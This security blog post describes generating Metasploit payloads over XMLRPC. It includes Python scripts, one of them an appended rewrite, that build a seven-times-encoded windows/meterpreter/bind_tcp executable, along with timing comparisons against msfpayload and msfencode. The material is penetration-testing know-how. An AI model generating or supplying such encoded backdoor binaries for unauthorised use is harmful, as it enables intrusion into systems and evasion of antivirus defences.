Security Notes, News, and Thoughts

Fun with Metasploit payload generation

Tonight has been fun: I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality to the generate_simple function that is used by both XMLRPC and the console, so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit, encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import sys
import xmlrpclib
import binascii

# msfrpcd listening on the XMLRPC port
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

# auth.login returns {'result': 'success', 'token': ...} when the
# credentials are accepted; anything else is a failed login
ret = proxy.auth.login("msf", "abc123")
if ret['result'] == 'success':
    token = ret['token']
else:
    sys.stderr.write("Could not login\n")
    sys.exit(1)

# Options understood by the patched generate_simple: output format,
# number of encoding passes, and encode even when not strictly needed
opts = {
    "Format": 'exe',
    "Iterations": 7,
    "ForceEncode": True}

# The generated payload comes back hex-encoded in ret['payload'];
# write the raw bytes without a trailing newline so stdout can be
# redirected straight into a file
ret = proxy.module.execute(token, "payload", "windows/meterpreter/bind_tcp", opts)
if ret['result'] == 'success':
    sys.stdout.write(binascii.unhexlify(ret['payload']))
else:
    sys.stderr.write("Payload generation failed\n")
    sys.exit(1)

Next, I decided to test the xmlrpc approach against the traditional way of doing it:

root@bt:~/msfmods/py# time (python > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
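As an added example (not the script from the post and not Metasploit's own code), here is a Python 3 version of the same auth.login / module.execute sequence that checks the reply before anything is written to disk, and generalizes the header check to a few output formats beyond the exe case the post shows. The URL and credentials are the ones used above; the Format, Iterations and ForceEncode options only exist with the uncommitted patch described in the post, so that is an assumption, as is the hypothetical FORMAT_MAGIC table and the choice of output path.

```python
"""Fetch an encoded payload over the Metasploit XMLRPC interface (Python 3).

Assumptions (not from the original post): msfrpcd on localhost:55553 with
user "msf" / password "abc123", and a server that understands the
Format / Iterations / ForceEncode options from the post's patch.
"""
import binascii
import os
import sys
import xmlrpc.client

MSFRPC_URL = "http://localhost:55553"  # assumed, as in the post

# Hypothetical table of expected leading bytes per output format; formats
# missing from it (e.g. "raw") get no header check.
FORMAT_MAGIC = {
    "exe": b"MZ",
    "dll": b"MZ",
    "elf": b"\x7fELF",
}


def login(proxy, user, password):
    """Return the session token, or raise if auth.login did not succeed."""
    ret = proxy.auth.login(user, password)
    if ret.get("result") != "success":
        raise RuntimeError("login failed: %r" % (ret,))
    return ret["token"]


def payload_options(fmt="exe", iterations=7, force_encode=True):
    """Options for the patched generate_simple, as used in the post."""
    return {"Format": fmt, "Iterations": iterations, "ForceEncode": force_encode}


def decode_payload(ret, fmt):
    """Turn a module.execute reply into raw bytes.

    Refuses replies whose result is not 'success', and replies whose
    decoded bytes do not start with the header expected for `fmt`.
    """
    if ret.get("result") != "success":
        raise RuntimeError("payload generation failed: %r" % (ret,))
    data = binascii.unhexlify(ret["payload"])
    magic = FORMAT_MAGIC.get(fmt)
    if magic is not None and not data.startswith(magic):
        raise ValueError("unexpected header %r for format %s" % (data[:4], fmt))
    return data


def fetch_payload(proxy, token, name, opts):
    """Run the payload module through module.execute and decode the reply."""
    ret = proxy.module.execute(token, "payload", name, opts)
    return decode_payload(ret, opts["Format"])


def write_payload(path, data):
    """Write the binary with O_EXCL so an existing file is never clobbered."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else "/tmp/test3"  # assumed path
    proxy = xmlrpc.client.ServerProxy(MSFRPC_URL)
    token = login(proxy, "msf", "abc123")
    opts = payload_options(fmt="exe", iterations=7)
    data = fetch_payload(proxy, token, "windows/meterpreter/bind_tcp", opts)
    print("wrote %d bytes to %s" % (write_payload(out, data), out))
```

Checking the leading bytes replaces the manual `file` check from the timing run: a reply that reports success but does not decode to a PE is rejected rather than written out. The tiny client-side CPU figure in the timing above (user 0m0.020s) is also what you would expect here, since the encoding runs inside the already-loaded msfrpcd process and the client only decodes hex.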

It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little more time off of it. Being able to do this over XMLRPC will hopefully give folks a good way to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions?

Hit me up at sussurro [aT] happypacket DOT net